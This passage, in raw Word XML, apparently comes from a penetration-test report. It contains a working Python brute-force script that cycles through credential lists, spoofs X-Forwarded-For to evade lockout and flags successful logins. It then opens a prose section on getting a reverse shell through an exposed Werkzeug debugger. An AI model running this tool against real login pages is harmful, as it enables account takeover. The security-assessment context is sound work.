          <w:p w14:paraId="0F9AD9FB" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>open_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(args.logins.name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A91FAA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6D30A069" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D86CC4F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = [ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3758EFC1" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="69F29F18" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1BCE4FB6" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="54D4B37C" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.additional</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF688FD" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="52F25628" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_additional_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>json.loads</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.additional</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E02D4D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7436A49B" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55D301" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="4A8CC194" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_additional_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EB1A1E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1A55B217" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="649DD0E1" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="15632E3E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>print("[+] Attacking {u}".format(u = args.url))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F1C696" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="0E5C159A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7DB575C1" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="357371E3" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E4E636" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="706069CD" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    for username in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC7C28D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="337F7669" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        for password in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>password_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEE7628" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="4637B878" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            session = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>requests.Session</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62ACA890" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="14CB7568" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            page = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(args.url)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C63C922" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7B27F996" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>re.search</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('input.+?name="'+</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.csrf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">+'".+?value="(.+?)"', </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>page.text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).group(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479EE056" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="35110C00" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A061DC9" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="07B1944B" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            print('[-] Testing User = {u} and Password = {p}'.format(u = username, p = password))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4292C6C8" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="13E0AFB7" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC1B6C7" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7B8DCC14" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            headers = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DB08AA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="32E81CBA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                'X-Forwarded-For': password,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA2E38A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="3CFFE20D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                'User-Agent': 'Mozilla/5.0 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>X11</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">; Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>x86_64</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rv:68.0</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) Gecko/20100101 Firefox/68.0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8FDA0D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="0CACE996" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Referer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>': args.url</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6089D032" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="2204EA8E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A6FBA4" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6E1082F0" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7C3284" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="59AAB935" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_login_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05901C7F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="04A1D961" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">': </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501D1C47" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="07D2B8EC" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                'email': username,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A0CE324" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1B72B8C4" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                'password': password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B270522" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="42FC993B" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8F48E4" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = {**</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_login_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, **</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_additional_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66EC5893" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="140EE216" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A0421F0" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="2B96B3A7" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            result = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(args.url, headers = headers, data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>allow_redirects</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F76E1BD" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1EBEE1DC" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEB725E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="328F3187" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">            if 'location' in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>result.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>result.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>['location'] != args.url:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6BD66B" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="560DA08F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bcolors.OKGREEN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + '[!] Password found! Use {u}:{p} to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.'.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(u = username, p = password))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D5780C" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="0F6B45FF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">                print('[!] Login redirects to {r}'.format(r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>result.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">['location']) + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bcolors.ENDC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2168EEC0" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="519C0E8C" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>KeyboardInterrupt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE6DFAF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="362019B6" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("[!] Interrupted")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08872C91" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="44C57B29" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="424332DF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C" w:rsidP="00E01B85"/>
    <w:p w14:paraId="177DFE06" w14:textId="1434A24D" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t>Run the script with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786EF17" w14:textId="67D8DD45" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF29768" wp14:editId="41C2C3A8">
            <wp:extent cx="5730875" cy="1652270"/>
            <wp:effectExtent l="0" t="0" r="3175"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0875" cy="1652270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F270F" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t>Again, you should replace the IP address, username, and dictionary with your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA6543" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B63BA" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t>Both methods have their own downsides, but the first one is way more user friendly. The second one is way more versatile and will also work with admin login page. For both of them dictionary will need to be provided that actually contains the passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DDACBD" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38A427" w14:textId="2703791E" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t>WEB LOGIN BRUTE FORCE – Ada Wells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE4FAC" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43225A6A" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A4756" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372ECD12" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D73E2A6" w14:textId="15674E2D" w:rsidR="00C84C06" w:rsidRPr="003001C2" w:rsidRDefault="00C84C06" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003001C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VULNERABILITY 5</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="003001C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003001C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> REVERSE SHELL (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C89EE" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESEARCH UNDERTAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C646699" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>Reverse python Shell on Flask Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0CE3A" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>There are security risks that come with unproperly configured Flask website. There is a vulnerability found in Flask applications that can lead to Remote Code Execution (RCE) allowing arbitrary commands using the Werkzeug Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B46E52" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>Werkzeug is a comprehensive WSGI web application library used for troubleshooting and error logs. WSGI stand for “Web Server Gateway Interface” is a specification that describes how a web server (for example Apache) communicates with web applications (flask web app). Werkzeug includes an interactive debugger that allows inspecting stack traces and source code in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F9252B" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">The issue here is not the Werkzeug debugger itself, but an incorrect way of configuring a Werkzeug application. By making the debugger available on a production machine, when the application uses Werkzeug allows the user also to access the debugger console by navigating to the path “/console”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613B33E" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>This console usually has a default PIN however, it is possible that the PIN has been disabled in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABC2F8" w14:textId="6588C619" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>If that would be the case, a malicious user could craft a python payload that would allow the remote machine to initiate a reverse tcp connection towards the hacker machine, creating in this way a reverse shell connection using the werkzeug debugger console.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1850093302"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00910C41">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00910C41">
            <w:instrText xml:space="preserve"> CITATION hac \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00910C41">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00910C41">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (Li, 2020)</w:t>
          </w:r>
          <w:r w:rsidR="00910C41">
